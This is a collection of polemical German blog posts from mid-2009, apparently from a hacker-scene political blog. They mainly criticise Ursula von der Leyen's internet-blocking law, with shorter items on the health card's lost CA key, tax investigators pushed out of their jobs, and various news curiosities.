[l] Die Schweden haben eine Lösung für die Finanzkrise gefunden: die schwedische Zentralbank hat den Zinssatz negativ gemacht. Wenn eine Bank also jetzt ihre Liquidität nicht an die Kunden weitergibt, sondern bei der Zentralbank parkt, dann kriegen sie nicht nur keine Zinsen dafür, sie müssen noch Strafe zahlen. Ich frage mich, warum das sonst noch keiner macht. (via) (Danke, Christoph)
[l] Oh übrigens, wenn die Zensursula das nächste Mal fragt, was denn unser Vorschlag gegen die Kinderpornographie im Internet ist: es nicht soweit kommen lassen, dass der Leiter der Zentralstelle im Kampf gegen Kinderpornographie in Sachsen-Anhalt hinwirft. Der Herr Oberstaatsanwalt begründete das mit "unhaltbaren Zuständen in den Polizeidirektionen".
So müssten Strafverfahren eingestellt werden, weil die Beweismittel wegen Personalmangels bei der Polizei nicht fristgerecht ausgewertet werden könnten, sagte er. Vor dem Landgericht Magdeburg hat gerade ein Kläger erfolgreich auf die Herausgabe von Datenträgern nach anderthalb Jahren geklagt. Gegen ihn war wegen des Besitzes von Kinderpornografie ermittelt worden.
Den haben sie mal nach Strich und Faden ausgebremst und das dann noch in der Öffentlichkeit ihm in die Schuhe schieben wollen. Und so funktioniert Symbolpolitik. Im Wahlkampf rumtösen, dass man jetzt gegen Kinderpornos kämpft, dann das Internet zensieren wollen und am Ende hat man das gesamte Budget für den Wahlkampf rausgeblasen und hat kein Geld mehr für die eigentlichen Ermittlungen und die Täter werden freigelassen.
Update: Nicht dass mich einer falsch versteht: das ist ein Vorkämpfer der Internetzensur und der hat auch die Operationen "Himmel", "Mikado" und "Marcy" gemacht, die allesamt sehr fragwürdig waren und deren vordringlicher Erfolg sich alleinig in Wahlkampfgetöse für Law and Order Parteien niederschlug. Aaaaaber: WENN man schon den (teilweise illegalen) Aufwand treibt und so viele Verdächtige durchsucht, und dann auf einem Haufen Material sitzt, dann muss man auch genug Personal kriegen, um das auszuwerten. Ich persönlich bin froh, dass der weg ist.

Thu Aug 27 2009

[l] Die CDU-Spindoktoren haben ja der Zensursula in letzter Zeit die PR-Aussage geändert. Genug, um da mal was richtig zu stellen.
Die offizielle Position in letzter Zeit ist: "die vom CCC sollen uns mal einen Alternativvorschlag machen, wenn sie nicht wollen, dass wir das Internet zensieren".
Das ist in mehrerlei Hinsicht eine Frechheit und fiese Schweinerei. Erstens: der gesamte Wahlkampf-Aktionismus (denn mehr ist es ja nicht) mit der Kinderpornographie fußt ja auf der Lüge, dass Kinderpornographie ein Wachstumsmarkt sei, dass es da täglich mehr Material gibt, und dass man da doch endlich mal was tun muss, um das einzudämmen. Die Realität könnte dem nicht krasser widersprechen. Es gibt keinen "Markt", eher eine Tauschbörse. Das Gros des getauschten Materials ist steinalt. Die Szene stagniert oder ist gar rückläufig.
Die Ansage, dass wir mal Alternativen nennen sollen, impliziert — sollten wir darauf eingehen — einen Konsens, dass es da ein wachsendes Problem gibt. Und das ist schlicht nicht so.
Aber selbst wenn wir das mal außen vor lassen: jedes Missbrauchsbild im Internet ist ein Bild zuviel, das sieht auch der CCC so. Daher haben wir im Februar 2009 eine Email an Zensursulas Ministerium geschickt, wo wir ihnen Hilfe bei der Strafverfolgung von Kinderpornographie angeboten haben. Die haben den Eingang bestätigt und das zu den Akten genommen und sich nie wieder gemeldet. Die Email war vom 12.2. Das selbe Angebot gab es am Vortag im persönlichen Gespräch mit Frau von der Leyen höchstselbst.
Ihr seht also: auf jeder Ebene ist das ein transparentes Lügengebilde, auf das hoffentlich niemand hereinfallen wird, der sich auch nur oberflächlich Gedanken zur Thematik gemacht hat.

Sat Aug 22 2009

[l] Wenn ihr alt genug seid, erinnert ihr euch vielleicht noch darum, wie die großen Parteien plötzlich den Umweltschutz entdeckt haben, als die Grünen auftraten und wie eine ernstzunehmende politische Kraft aussahen.
Genau das gleiche passiert gerade auch mit den Piraten. Und als erste entdecken die Grünen, dass sie ja auch mal was für den Datenschutz tun können: Die Grünen starten eine Auskunftskampagne zur Vorratsdatenspeicherung. Ein großer Sieg für die Piraten, und das noch vor der Wahl! :-)
Schade nur, dass die Grünen sich durch Hartz IV und den Krieg unwählbar gemacht haben.

Tue Aug 18 2009

[l] Habt ihr in letzter Zeit auch keine Post am Montag bekommen? Nun, das war ein Einspar-Test der Post. Die wollten ihren Profit maximieren und haben einfach am Montag keine Zustellung gemacht.
Ja, die machen jetzt schon Profit. Nein, die bezahlen ihren Zustellern keine Gehälter, von denen die leben können. Und ich würde mal meinen Arsch darauf verwetten, dass die eingesparte Kohle dann nicht den Zustellern zugute kommt.

Fri Aug 14 2009

[l] Anders als bisher angenommen werden bei der CIA sensible Operationen nicht aus dem Hauptquartier in Virginia sondern aus Frankfurt am Main gemanaged. die Frankfurter Rundschau hat auch was. Und der Leyendecker in der Süddeutschen.
Oh und mal als Vergleichswert: Schäuble traut den Amerikanern.
Übrigens: Hier das New York Times Dossier über den Mann.
[l] Das ist ja eine Schande — SCHANDE! Wir fiesen Hacker haben eine fiese Hacker-Manipulation bei der Merkel-Umfrage gemacht!1!!
Das muss stimmen, denn ich habe es im ehemaligen Nachrichtenmagazin gelesen!
Und wem kann man glauben, wenn nicht denen? Und auch bei der Zensursula-Umfrage (Seite 3 selber Artikel) haben wir fiesen Hacker fies eine "Vote-Manipulation" gefahren. Allerdings:
Bis zum Zeitpunkt der Vote-Manipulation gaben über 50 Prozent der Leser von der Leyen eine Sechs. Das reißt natürlich auch die Durchschnittsnote nach unten: Die Ministerin erhält einen Wert von 4,5.
Was ich ja am schockierendsten finde: 800 Leute sollen Ulla Schmidt eine 1 gegeben haben. Und DAS soll KEINE Manipulation sein?!? So viele Kinder hat die doch gar nicht!
Update: Oh nein! Ist mein blog jetzt ein Hackertool?
[l] Diese Nummer mit dem russischen Frachtschiff, das in der Ostsee verschwunden ist, das ist ja konspirologisch echt ergiebig.
Also, das Schiff heißt Arctic Sea, danach könnt ihr ja mal googeln. Es ist ein russisches 4000-Tonnen-Schiff, also nicht gerade klein, das offiziell Holz aus Finnland nach Algerien bringen sollte. Der letzte Funkkontakt war mit der britischen Küstenwache, aber Interpol sagt, das Schiff sei bereits in der baltischen See verschütt gegangen. Da müsste also jemand den Radiokontakt mit den Briten fingiert haben, um den Verschwindeort zu verschleiern.
Dann gibt es da noch so Details wie dass das Schiff offenbar vorher noch zwei Wochen in Kaliningrad vor Anker lag. Die Russen haben mal eben ihre Flotte inklusive zweier Atomuboote mobilisiert, damit die die Gegend absuchen.
Das alles legt ja schon Spekulationen nahe, ob da vielleicht mehr als nur Holz an Bord war. Spannende Geschichte jedenfalls!
Update: Hier vertritt jemand die Theorie, nicht die Ladung sondern das Schiff sei gekapert, umgemalt und dann unter anderem Namen weiterverkauft worden.

Thu Aug 6 2009

[l] Ich fordere, die Immunität von Bundestagsabgeordneten generell aufzuheben. Begründung: das Parlament darf kein rechtsfreier Raum sein.
Außerdem fordere ich die Einführung einer Three Strikes Regel. Wenn ein Politiker das dritte Mal in einer Talkshow auftritt oder anderweitig öffentlich lügt, wird ihm die Bürotür zugemauert.

Tue Jul 28 2009

[l] Brüller des Tages: New York hat in ihren "Starenkästen" professionelle Nikon-Spiegelreflexkameras eingebaut, und das haben ein paar Drogis mitgekriegt und 22 davon aufgemacht und die Kameras darauf an Pfandhäuser verscheuert, die findet man jetzt wohl partiell auf Ebay. Hier gibt es ein Foto des Beschuldigten :-)
Update: Auch bei uns passiert sowas.

Sat Jul 25 2009

[l] Und hier ist die gruseligste Meldung des Jahres: Chinesische Wissenschaftler haben aus Hautzellen einer Maus Stammzellen gemacht, und aus denen neue Mäuse geklont. Überlegt euch mal die Implikationen. Ob die damit auch die Hautschuppen verwerten können, die jeder von uns dauern überall beim Anfassen oder Vorbeilaufen hinterlässt?

Thu Jul 23 2009

[l] Wir beschimpfen die Zensursula und ihre Zensur-Erfüllungsgehilfen ja gerne als Internetausdrucker, und da ist anscheinend auch was dran. Mir emailt gerade jemand, dass er neulich beim ehemaligen Nachrichtenmagazin ein jugendpornographisches Bild von Nastassia Kinski gefunden hat, und das dann zwecks Zensur die URL an Zensursula (wen auch sonst) gemailt hat. Eine Antwort kam dann von jugendschutz.net, nicht von Zensursula, und die schrieben, die URL sei 404. Der Hammer: sie quoten in der Email die URL. Und die URL, die sie probiert haben, sieht so aus:
```
http://einestages.spiegel.de/external/ShowTopicAlbumBackground/a4469/112/10/F.html#featuredEntry
```
Guckt genau hin! Es ist l12/l0 und nicht 112/10! Das ist natürlich schwer zu sehen, wenn man sein Internet ausdruckt. *facepalm* (Danke, Georg)

Thu Jul 16 2009

[l] Update zu dem Steuerfahnder-Kram. Dort erwähnte ich ja folgendes:
Die Krönung ist, als sie dann die Fahnder ernsthaft von einem Psychiater dienstunfähig schreiben lassen.
Das ist jetzt offenbar tatsächlich mal jemandem aufgefallen (einem Leser?), und die haben mal nachgetreten. Wenig überraschend sind dabei unschöne Dinge rausgekommen:
Der Neurologe und Psychiater Thomas H. attestierte den Fahndern "paranoid-querulatorische" Charaktereigenschaften und "chronische Anpassungsstörungen".
Aaaaaaha. Im Übrigen auch wenig überraschend ist, dass sie genau die guten Fahnder so rausgeekelt haben, die ganzen Flaschen haben sie behalten:
Den Fahndern Rudolf Schmenger, Tina und Heiko Feser sowie Marco Wehner wurde Dienstunfähigkeit auf Lebenszeit bescheinigt.
Dabei waren sie die fähigsten Beamten der Abteilung V des Frankfurter Finanzamtes. Sie spürten die Großsteuerbetrüger und ihre Konten in Liechtenstein auf. Sie durchsuchten die Commerzbank, die ihren Kunden bei der Steuerflucht geholfen hatte und später rund 200 Millionen Euro an Steuern nachzahlen musste. Insgesamt bescherte die Arbeit der Fahnder dem Land Hessen im Jahr 2001 rund 250 Millionen Mark und dem Bund rund eine Milliarde an Steuereinnahmen.
Auch ansonsten haben die dort spannende Innovationen auf dem Gebiet der Entbürokratisierung gemacht:
Ralf Amthor, Beamter der selben Abteilung, wagte es im Jahr 2000, gegen eine schlechte Beurteilung Widerspruch einzulegen. Sein Vorgesetzter vernichtete das Papier einfach. "Er hat es vor meinen Augen in den Schredder geworfen", sagt Amthor. Er sollte den Widerspruch zurücknehmen.
Die Theorie der FR ist, dass die CDU ihren Spendensumpf schützen wollte, den sie ja auch über eine Stiftung in Liechtenstein an den Steuern vorbei hinterzogen haben. Das erscheint mir schlüssig.
Ich vermute ja sowieso hinter allen größeren Kriminalfällen entweder den Vatikan oder die CDU. Selbst wenn es nicht stimmt, ist es doch sehr unterhaltsam, sich die möglichen Details auszumalen :-)

Tue Jul 14 2009

[l] Nach Winnenden haben diverse Menschen ihre Waffen abgegeben. Und wißt ihr, was das Ordnungsamt mit den Waffen gemacht hat? Na? Kommt ihr nie drauf! Sie haben sie weiterverkauft. (via)

Sun Jul 12 2009

[l] Brüller der Woche: US-Offizielle empfehlen, den RFID-Pass in einer HF-Schutzfolie zu transportieren.
To protect against skimming and eavesdropping attacks, federal and state officials recommend that Americans keep their e-passports tightly shut and store their RFID-tagged passport cards and enhanced driver's licenses in "radio-opaque" sleeves.
Ich mache das ja auch so mit meinem Pass (zu haben beim FoeBuD-Shop) und habe damit bisher gute Erfahrungen gemacht. In Frankfurt am Flughafen hab ich dann den Ausweis beim Metalldetektor in der Hosentasche vergessen und der mußte nochmal durch, und der Rent-A-Cop zeigte sich verwirrt, weil das ja dann total sinnlos sei mit dem Chip und so :-)

Fri Jul 10 2009

[l] Bei mir kam gerade ein sehr spannendes Gerücht zur Gesundheitskarte rein. Die Gematik ist ja nicht völlig lobotomiert und outsourced Dinge, bei denen ein Versagen katastrophale Konsequenzen für das Projekt hat, an andere Gewinner-Firmen, die dafür kompetent sind. In diesem All-Star-Gewinner-Team ist der Auftrag für die PKI an die Bundesdruckerei gegangen, und zwar an deren Tochter D-Trust. D-Trust als ordentliche CA hat den CA-Root-Schlüssel natürlich nicht einfach so auf einem PC rumfliegen sondern auf einem HSM gespeichert. Und dort ist er jetzt verloren gegangen, sagt das Gerücht.
Nun kann sowas viele Ursachen haben. Leider war nicht Teil des Gerüchtes, was da genau passiert ist. Aber das Gerücht beinhaltete die Aussage, dass sie deshalb keine neuen Gesundheitskarten rausgeben können, die sich gegenüber den Karten der Generation 1 authentisieren können. Wenn das stimmt, dann heißt das, dass die Herren Spezialexperten von D-Trust keinen Backup des Schlüssels gemacht haben, was selbstverständlich möglich ist mit HSMs. Oder vielleicht haben sie ja ein Backup gemacht, aber nicht ordentlich gelagert? Oder sie haben das Backup an die Gematik übergeben und die haben einen Kaffeefleck drauf gemacht? Wer weiß.
Ich denke mal, da werden wir in den nächsten Tagen noch was zu hören. In der Wahlkampfzeit ist das hoffentlich der Todesstoß für die Gesundheitskarte. Angezählt ist das Projekt ja schon länger.
Ich bin auch mal gespannt, wie die Bundesdruckerei sich aus diesem Epic Fail rauszureden gedenkt. Oder das Gerücht ist falsch, kann ja auch sein.
Update: Heise bestätigt das Gerücht und hat noch ein paar Details. Soso, ein Spannungsabfall. Da liegt ja die Vermutung nahe, dass Vattenfalls Krümmel-Abschaltung hier die Gesundheitskarte runtergefahren hat. Danke, Vattenfall! Sehr schön auch das interne Fingerzeigen, das Heise da wunderbar in die Meldung gepasted hat. Bwahahahaha, "die waren's!" "nein, die anderen waren's!" Einmal mit Profis arbeiten!
[l] Spaß mit einer geleakten Google-Präsentation.
Ist euch mal aufgefallen, dass Google noch nie irgendwas schlimmes mit den gesammelten privaten Daten gemacht hat? Klar, die sammeln da alles mögliche, und damit könnte man furchtbare Dinge dataminen. Aber hatte Google schon mal einen Datenverlust wie die Telekom? Haben die schon mal versehentlich Millionen von Kundendatensätzen im Internet veröffentlicht? Klar, die hatten schon mal Bugs in ihrem Mailsystem, geschenkt. Was ich sagen will: bei Google heulen alle immer rum, dabei sind die noch nie auf dem Schwarzmarkt mit einem Geldkoffer erwischt worden, im krassen Gegensatz zur CDU z.B.
Und die selben Politiker auf Populismustour, die bei Google von Datenkraken reden, die kommen beim BKA und der Vorratsdatenspeicherung immer mit der "das würden die doch nie tun!1!!" Tour.

Mon Jul 6 2009

[l] Die Vorbereitungen für einen Angriff Israels auf den Iran gehen weiter: "Israel forciert Pläne für Militärschlag gegen Iran". Achtung, Spuckbeutel bereit halten:
Die brutale Niederschlagung der iranischen Opposition hat Israels Auffassung gestärkt, dass ein Dialog keine Chance hat. Am Ende, so die Analyse der Regierung in Jerusalem, kann nur ein Militärschlag Teheran vom Bau der Atombombe abhalten.
Da läuft die Bullshit-Schleuder-Maschine auf Hochtouren! Brutale Niederschlagung also, ja? Was ist denn passiert, hat man ihnen die Häuser mit Bulldozern planiert? Haben sie Massenverhaftungen gemacht? Checkpoints eingerichtet? Sind sie mit Panzern durch ihre Flüchtlingslager gefahren? Nein? Nein. Sowas macht Israel, nicht der Iran.
Und die Amis? Was machen die Amis? Biden sagt an, die USA würden einen israelischen Angriff auf den Iran nicht verhindern, und Israel sei dazu berechtigt. WTF? Berechtigt?!? Und natürlich wäre das kein solider Journalismus, wie wir ihn vom ehemaligen Nachrichtenmagazin kennen, wenn da nicht mal wieder ein Knallbonbon wie dieser käme:
Ahmadinedschad hat mehrfach mit der Vernichtung Israels gedroht und den Holocaust als "Mythos" bezeichnet.
Ah ja. Soso. Brilliant recherchiert, liebes Meinungsmagazin.
Update: Falls das jemand nicht gesehen hat: da war am Ende des ersten Links der Zensor pinkeln:
Vier der zehn Torpedorohre wurden auf Wunsch der Israelis vom deutschen Hersteller so ausgestattet, dass sie auch Raketen mit Nuklearsprengköpfen abschießen können. Für eine solche Drohung seien die Iraner empfänglich, glaubt man in Jerusalem. Schließlich würde Teheran selbst in erster Linie wegen der Abschreckung an der Bombe bauen, sagen die israelischen Militärstrategen, und nicht um sie wirklich einzusetzen.

Sat Jul 4 2009

[l] Lacher der Woche: Steinmeier wirft der FDP Verrat vor. Oh was könnte ich da alles schönes zu sagen! Vielleicht "Na immerhin kennt er sich da aus"? Oder "Keine Angst, Ihnen können die nicht das Wasser reichen"? Inhaltlich hat er natürlich völlig Recht:
Die Freien Demokraten hätten in Koalitionen mit der Union ihre liberalen Traditionen bei den Bürgerrechten wiederholt verraten, sagte der Außenminister am Freitagabend auf einer SPD-Veranstaltung in Berlin.
Sie seien immer wieder "zu Kreuze gekrochen", wenn die CDU etwa mit Unterschriftenkampagnen Stimmung gegen in Deutschland lebende Ausländer gemacht habe.
Völlig anders die SPD, mit der hätte man Dinge wie Hartz IV, einen Angriffskrieg im Kosovo, Rasterfahndung, Vorratsdatenspeicherung, etc nie machen können!1!! (Danke, Christian)

Fri Jul 3 2009

[l] Tauss klopft im Bundestag mit dem Schuh auf den Tisch. Vor einer versammelten Publikumsmasse von ca 10 Gestalten. Bei der bahnbrechenden Grundsatzdebatte zur Achtung der Grundrechte, zu der Heise eine dicke Meldung hat, bei der das irgendwie wichtiger klingt. Da haben wir jetzt einen Mann im Bundestag, der sich als erster mal darüber aufregt, dass Computerspieler als Killerspieler herabgewürdigt werden, und was bringt uns das? Das Gehör von einem halben Dutzend MdBs, die nebenher telefonieren. Dieses Parlament ist eine Farce. Wozu haben wir das eigentlich? Ich kann mich gar nicht erinnern, wann die zuletzt mal was für uns gemacht haben.
Oh übrigens: Tauss erwähnt die Verräterpartei :-)

Thu Jul 2 2009

[l] Mir ist gerade dieser tolle Aushang der Thüringer Polizei zur mg zugemailt worden. Das soll so ungefähr von Ende 2007 sein. Kurz zusammengefasst sucht die Thüringer Polizei Menschen, die "die intellektuellen und sachlichen Voraussetzungen" erfüllen, "die für das Verfassen eines vergleichsweise anspruchsvollen Bekennerschreibens erforderlich sind". Mhh, das schränkt den Täterkreis noch nicht genug ein, findet ihr? OK, dann nehmen wir auch noch das zweite Merkmal dazu:
- Der Person stehen Bibliotheken zur Verfügung, die sie unauffällig nutzen kann, um die zur Erstellung eines Bekennerschreibens erforderlichen Recherchen durchzuführen
Wow! Zugang zu einer Bibliothek! Offenbar stehen Bibliotheken in Thüringen nicht jedem offen. Der Rest der Punkte ist auch toll:
-Die Person hat sich irgendwann mit Menschen getroffen, die möglicherweise politisch motivierte Straftaten begangen haben.
Geht es vielleicht noch etwas unkonkreter?
- Von der Person verfasste Artikel oder wissenschaftliche Abhandlungen enthalten Schlagwörter und Phrasen, die in den Texten der "militanten gruppe (mg)" ebenfalls verwendet werden. (Z.B. Gentrifizierung, Militarismus, neoliberal, Hartz IV)
- Die Person beschäftigt sich mit Themen wie Weltwirtschaftsordnung, Prekarisierung, Stadt- und Regionalentwicklung.
- Die Person hat an Demonstrationen oder an anderen Aktionen gegen den G8-Gipfel teilgenommen, die nach Auffassung des Oberverwaltungsgerichts Greifswald das Ansehen der Bundesrepublik Deutschland gefährdet haben.
Und da wird einem schlagartig klar, wieso die sich so auf Andrej Holm eingeschossen haben. Wenn das die offiziellen Fahndungskriterien waren, …

Mon Jun 29 2009

[l] Länderdomino: Putsch in Honduras, Präsident vom Militär rausgekantet. Da stand gerade ein Referendum zu einer Verfassungsänderung an. Der oberste Gerichtshof des Landes hat das Referendum untersagt und der Präsident hat das trotzdem gemacht, daher hat die Judikative das Militär losgeschickt, um den Präsidenten rauszukicken und die Wahlzettel für das Referendum einzusammeln.
Das wäre doch auch für uns mal ein Modell, oder? Bundeswehreinsatz im Inneren, um Schäuble und Co zu entfernen? Die können ja auch in Costa Rica Asyl beantragen. (Danke, Ralf)

Thu Jun 25 2009

[l] Gruseliges Gesundheitskarte-Update: "Studie" spricht sich gegen dezentrale Speicherung aus, weil man bei zentraler Speicherung der Daten ja ein Backup ziehen kann. Das bringt natürlich nur dann was, wenn die Daten nicht mit einem Schlüssel verschlüsselt sind, den nur der Patient hat, denn sonst wäre das Argument ja hinfällig. Daraus schließen wir mal messerscharf, dass sie einen Zweitschlüssel haben oder gar nicht verschlüsseln.
Anders formuliert: alle bisher gegebenen Sicherheitsversprechen bezüglich der Gesundheitskarte haben sich gerade in Wohlgefallen aufgelöst.
Tolle Wurst.
Oh, und wer hat diese Studie gemacht? Na? Wer ist das dimap infratest unter den Wissenschaftlern? Wo geht der Staat hin, wenn er ein "Gutachten" braucht, dass Datenschutz eh nicht funktioniert und man das daher auch gleich ganz bleiben lassen kann? Na? Na klar! Zur Fraunhofer-Gesellschaft!
[l] Fefe-Watch: Das ehemalige Nachrichtenmagazin linkt auf mich! Bisher kamen ca 250 Hits von da. Kris Köhntopp hat da deutlich mehr Traffic gemacht. Naja, vielleicht kommt ja noch was nach. :-)
Update: inzwischen sind es knapp tausend.
Update: 24h später sind es schon knapp 4000. Doch, nicht so schlecht.
[l] So, dann wollen wir uns mal das "Streitgespräch" zwischen Franziska Heine und Ursula von der Leyen in Ruhe anschauen. Als erstes fällt auf, dass das weniger ein Gespräch als ein Wahlkampf-Monolog von Zensursula ist. Auf der einen Seite bin ich sauer auf die Zeit, dass ihre Moderatoren das geschehen liessen. Die haben Ursula auch einige krasse Exzesse durchgehen lassen, die das Fremdschämen hinter sich lassen und Zorn auslösen. Auf der anderen Seite ist das natürlich gut, dass sie der Ursula genug Seil gegeben haben, dass sie sich damit aufhängen konnte. Aber der Reihe nach.
Es geht mit den üblichen Lügen los, dass das Internet ein rechtsfreier Raum sei, dass es dieses Gesetzes bedürfe, um das Verbot von Kinderpornographie im Internet durchzusetzen, dass die Verfügbarkeit von Kinderpornos ein Anreiz für weitere Missbrauchsfälle sei. Haben wir alles schon zigmal widerlegt, spare ich mir hier.
Franziska hält dagegen, vergreift sich aber bei der Wortwahl "ineffizient". Das ist kein Zeichen von Ineffizienz. Ineffizienz ist, wenn man zu wenig blockt. Wenn man zuviel blockt, ist das Missbrauch der Zensurinfrastruktur. Daher warnen wir ja auch vor Missbrauch. Das ist keine theoretische Erwägung, sondern das kann man bei allen "Vorbildern" für unsere Zensurinfrastruktur so live und in Farbe beobachten. Und da kommen wir zum ersten Schenkelklopfer von Zensursula:
Die genaue Recherche zeigt, dass diese Listen oft schon alt waren und völlig überholt. Das ist kein wirkliches Argument.
Und dann wechselt sie das Thema. So einfach geht das bei uns im politischen Diskurs.
Als nächstes kommt ihr Vergleich mit einem Bildband in der Buchhandlung, und Zensursulas Argumentation fußt am Ende auf der Behauptung, die Sperren in den anderen Ländern würden täglich zehntausende von Leuten vom Kinderpornoklicken abhalten. Hier hätte man einhaken müssen, woher Sie denn weiß, dass die Leute nach Kinderpornos gesucht haben? Das könnte ja auch ein Cron Job sein, der alle Domains durchgeht, um zu gucken, welche zensiert werden. Oder ein Netzaktivist, der alle Einträge der Sperrliste in einem Iframe verlinkt, um zu zeigen, wie sinnlos diese Sperren sind. Oder oder oder. Oder vielleicht klickt da auch gar keiner drauf und das ist nur eine Schutzbehauptung der Behörden, um ihr Gesicht zu wahren angesichts der offensichtlichen Nichtwirksamkeit der Sperren. Damit kommen wir zum nächsten Schenkelklopfer:
Wer die Stoppseite zu umgehen versucht, macht sich bewusst strafbar, weil er dann aktiv nach Kinderpornografie sucht.
Das ist natürlich Unfug. Ich habe z.B. einen eigenen DNS-Resolver am Start, weil ich für mich kritische Infrastruktur lieber selber betreibe als sie an andere outzusourcen. Damit "umgehe" ich etwaige DNS-Sperren. Und selbstverständlich mache ich mich damit nicht strafbar, schon gar nicht bewußt, und ich suche auch nicht nach Kinderpornographie, und selbst wenn jemand nach Kinderpornographie sucht, macht er sich nicht automatisch strafbar.
Mein persönlicher Höhepunkt ist aber der folgende Satz, bei dem ich wahrscheinlich ausfallend geworden wäre:
Aber es ist interessant, dass Sie jetzt leugnen, dass es einen Massenmarkt von Kinderpornografie im Internet gibt.
Un-glaub-lich. Völlig untragbar! Wie konnte diese Person jemals für irgendein Amt mit Menschenkontakt zugelassen werden? Die wäre ja schon als Schülersprecher ungeeignet! Leugnen! Wenn man bedenkt, dass die Däubler-Gmelin damals für deutlich weniger zurück getreten ist. Oh und als Quelle für ihre wilden Fantasiezahlen zum angeblichen Massenmarkt Kinderpornographie nennt sie Unicef, die Internet Watch Foundation und das BKA. Das BKA sagt in der polizeilichen Statistik das Gegenteil, die Internet Watch Foundation hat sich u.a. durch die Sperrungen von Wikipedia und archive.org komplett lächerlich gemacht (und selbst DIE sagen in ihrer Statistik das Gegenteil) und Unicef hat sich als Quelle unbrauchbar gemacht.
Als nächstes lügt Ursula lächelnd der Kamera folgendes ins Gesicht:
Gleichzeitig sehen wir deutlich mehr Fälle bei der Verbreitung kinderpornografischer Schriften.
Tatsächlich sind sie konstant geblieben. Aber wartet, wir noch härter:
Dazu müssen wir von einer hohen Dunkelziffer ausgehen.
ACH. Jetzt begründen wir schon mit Fantasie-Dunkelziffern Zensurgesetze, ja? Missile Gap, anyone?
Der nächste Absatz muss insgesamt zitiert werden, um seine Absurdität voll zur Geltung zu bringen:
Der Kampf um Meinungsfreiheit war immer berechtigt. Aber diejenigen, die in den vergangenen Jahrzehnten oder Jahrhunderten um die Freiheit von Zensur gekämpft haben, taten das, weil sie anders als die Obrigkeit dachten oder ihre Religion ausüben wollten. Aber niemals, damit Bilder von Gewalt oder Kinderpornografie verbreitet werden können. Freiheit kann nie bedingungslos sein. Ihre Grenze ist da erreicht, wo sie die Freiheit oder die Würde des Mitmenschen infrage stellt. Zensur in Deutschland wäre, wenn zum Beispiel das Wort "Zensursula" verboten würde. Aber dass Bilder von vergewaltigten Kindern nicht frei zugänglich sind, das ist keine Zensur.
Das müssen wir ihr dann halt schon glauben, dass da nur Kinderpornographie drauf ist. Und sie hat ja gerade demonstriert, wie glaubwürdig ihre Aussagen so sind.
Auf den Vorwurf, wir würden gerade Zensurregimes im Iran und in China durch unsere Zensur legitimieren, kommt dann folgender Hammer:
Exakt die Gegenpositionen nehmen namhafte Rechtswissenschaftler ein, die sagen: Die verfassungsrechtlich geschützte Informationsfreiheit deckt nicht, dass strafrechtlich relevante Inhalte zur Verfügung gestellt werden. Wir leben in einem Rechtsstaat. Die Diskussion um die aktuelle Zugangserschwerung zeigt, wie aufmerksam dieser Staat damit umgeht.
Erstens ist das nicht die Gegenposition, schon gar nicht die exakte, zweitens bestreitet niemand diesen sinnlosen Allgemeinplatz, drittens leben wir dank ihrer Zensurlisten und ihrer Abschaffung der Gewaltenteilung nicht mehr in einem Rechtsstaat und viertens zeigt die Diskussion das Gegenteil, nämlich dass der Staat seine Bürger ignoriert, selbst wenn sie ihm in der größten Petition in der Geschichte der Bundesrepublik deutlich mitteilen, dass sie weiterhin gerne in einem Rechtsstaat leben würden. Ich möchte an der Stelle auch mal einen echten Rechtswissenschaftler zitieren:
Or, as Petersmann memorably suggests, constitutionalism's foundational insight is that the central political question is not who shall govern, but rather 'how must laws and political institutions be designed … so that even incompetent rulers and politicians cannot cause too much harm' (Petersmann 1997)
Das Zitat kommt von Jeffrey L. Dunoff, "The WTO Constitution, Judicial Power and Changing Patterns of Authority", in Rittberger/Nettesheim: "Authority in the Global Political Economy", Basingstoke: Palgrave Macmillan 2008, S.68 (Dank an atoth fürs Raussuchen).
Den nächsten kapitalen 12-Ender, den sie schießt, muss man auch großflächig zitieren:
Es stimmt nicht, dass jeder kriminalisiert wird, der zufällig auf eine gesperrte Seite gerät. Das war mir wichtig, denn viele Nutzer kommen ungewollt auf diese Seiten. Ich habe deshalb gegen die Vorstellung der SPD gefochten, dass automatisch die Daten aller Nutzer gespeichert werden. Diese Daten werden jetzt sofort gelöscht.
Das muss man ja schon würdigen. So dreist in das Mikrofon zu lügen, ohne dabei das Gesicht zu verziehen, das erfordert jahreslanges Unehrlichkeitstraining. Tatsächlich ist das Gegenteil der Fall, und in einigen der Knebelverträge, die sie den ISPs aufgenötigt hat, steht das noch explizit drin, dass die Daten in Echtzeit ans BKA gehen sollen. Hat mir jemand geleakt. Wissen können wir das natürlich nicht, weil diese Verträge ja geheim sind. Wahrscheinlich sind sie auch genau deshalb geheim, damit nicht so auffällt, wie sehr uns die Ursula gerade ins Gesicht lügt.
Und auch die Darstellung, dass man ja den Betreibern nicht Bescheid sagen müsse, wenn man sie sperrt, weil es ja im Internet "40 Millionen Kontrolleure" gäbe, ist an Dreistigkeit kaum zu überbieten. Hier hat Franziska sehr schön schlagkräftig reagiert:
Heine: Wollen Sie die Bürger aufrufen, sich pädophilen Inhalten aussetzen zu müssen, um die Kontrolle demokratischer Rechte wahrzunehmen? Sie haben doch oft genug öffentlich gesagt, dass derjenige, der so etwas sieht, süchtig danach werden kann.
MUHAHAHAHA, sehr schön! Zu dem folgenden Charite-Verweis verweise ich auf netzpolitik.org, wo man sehen kann, dass ausgerechnet Zensursula einem Prof ausgerechnet an der Charite seine Arbeit nicht finanzieren wollte, der ausgerechnet Pädophilen ihre Neigungen kontrollieren helfen wollte.
Die geheimen Filterlisten verteidigt Zensursula mit der Lüge, dass man ja ansonsten die Ermittlungen öffentlich machen würde, und sie dann zum Erliegen kämen. Das ist natürlich, wie auch Franziska einwirft, eine groteske Falschdarstellung, weil die Webseite ja merkt, wenn ihre Kundschaft von einem Stoppschild aufgehalten wird. Die Ermittlung ist also bereits veröffentlicht zu dem Zeitpunkt.
Als Sahnehäubchen marginalisiert Zensursula dann noch die Petition mit den Worten
Ich meine: 134.000 Zeichner, das ist schon etwas. Aber es gibt 40 Millionen Internetnutzer.
und
von der Leyen: Ich kann das Gefühl schon nachvollziehen, aber eine Onlinepetition ist mit einem Klick unterschrieben …
Heine: … das stimmt nicht!
von der Leyen: Okay, vielleicht braucht es zwei, drei Minuten.
Was für eine schöner Arschtritt für die Bürger. Da seht ihr mal, wie wir hier mit aufmüpfigen Bürgern umgehen, die glauben, sie könnten Einfluß nehmen auf unsere sinnlosen Wahlkampf-Aktionismus-Gesetze! Als sie dann noch "Ausschussberatungen" als "demokratischen Prozess" bezeichnet, will man nur noch eine goldene Merkbefreiung am Bande überreichen. Die Frau muss da weg. Die hat schon mehr Schaden angerichtet als alle ihre Vorgänger zusammen.
